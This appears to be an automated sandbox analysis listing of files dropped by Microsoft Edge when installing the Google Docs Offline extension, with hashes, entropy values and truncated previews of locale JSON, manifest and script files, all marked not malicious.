                                                                                                                                                                                                                                                                                              MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                              SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                              SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                              SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                              MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                              SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                              SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                              SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1074
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                              MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                              MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):912
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                              MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                              SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                              SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                              SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2525
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                              MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                              SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                              SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                              SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                              MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                              SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                              SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                              SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):98880
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                              MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                              SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                              SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                              SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                              MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                              SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                              SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                              SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107677
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                              MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                              SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                              SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                              SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                              Malicious:false
